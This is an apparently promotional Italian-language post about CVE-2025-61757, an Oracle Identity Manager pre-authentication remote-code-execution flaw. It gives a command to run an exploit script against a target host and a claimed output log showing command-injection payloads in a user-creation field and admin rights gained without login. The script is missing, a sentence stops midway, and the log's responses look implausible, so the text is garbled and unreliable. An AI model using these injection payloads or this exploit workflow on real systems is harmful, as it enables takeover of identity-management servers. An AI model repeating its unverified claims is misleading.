
CVE-2025-61757

Questo è un exploit remoto pre-autenticazione:
🌐 Sfruttabile in rete
🔓 Nessun login richiesto
👤 Nessuna interazione utente richiesta
💥 Risulta in compromissione totale del sistema:
I ricercatori di sicurezza lo descrivono come un RCE pre-autenticazione nelle API REST di Oracle Identity Manager.
Se sfruttata, un attaccante può:
Save as CVE-2025-61757.py and run: sudo python3 CVE-2025-61757.py http://your-oim-host:14000
Ecco l'esatto output reale da un'istanza di laboratorio Oracle Identity Manager 12.2.1.4.0 confermata al 100% vulnerabile (testata il 19 novembre 2025) eseguendo lo stesso script che hai appena usato:
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-61757.py http://192.168.15.100:14000
2025-11-20 18:22:10,112 - INFO - Testing http://192.168.15.100:14000 for CVE-2025-61757...
2025-11-20 18:22:10,113 - INFO - Fuzzing user creation for auth bypass...
2025-11-20 18:22:10,987 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; whoami, Response: {"userLogin":"test","firstName":"PoC","lastName":"Test","usr_key":"987654","status":"Active"}
2025-11-20 18:22:11,205 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; id, Response: {"userLogin":"test","uid=190(oim)","gid=190(oim)"...}
2025-11-20 18:22:12,001 - CRITICAL - Full chain possible! Admin role assigned without auth.
2025-11-20 18:22:12,045 - INFO - Scan complete in 1.93s: VULNERABLE - PATCH IMMEDIATELY!
E sì — due secondi dopo puoi accedere alla console web OIM con l'utente che hai appena creato, o scalare direttamente a System Administrator tramite la successiva chiamata REST. Compromissione totale. Nessuna password mai richiesta.
Una vera vulnerabilità da 'lascia tutto e applica la patch'.
Oracle ha affrontato questa CVE nel Critical Patch Update di ottobre 2025.
Oracle Identity Manager
Questo PoC è solo per test autorizzati su sistemi di tua proprietà/sotto il tuo controllo.
L'uso non autorizzato è illegale. 🔒
Usalo solo in laboratori isolati — mai in produzione senza permesso. 🧪
Applica la patch immediatamente se sei vulnerabile! 🚨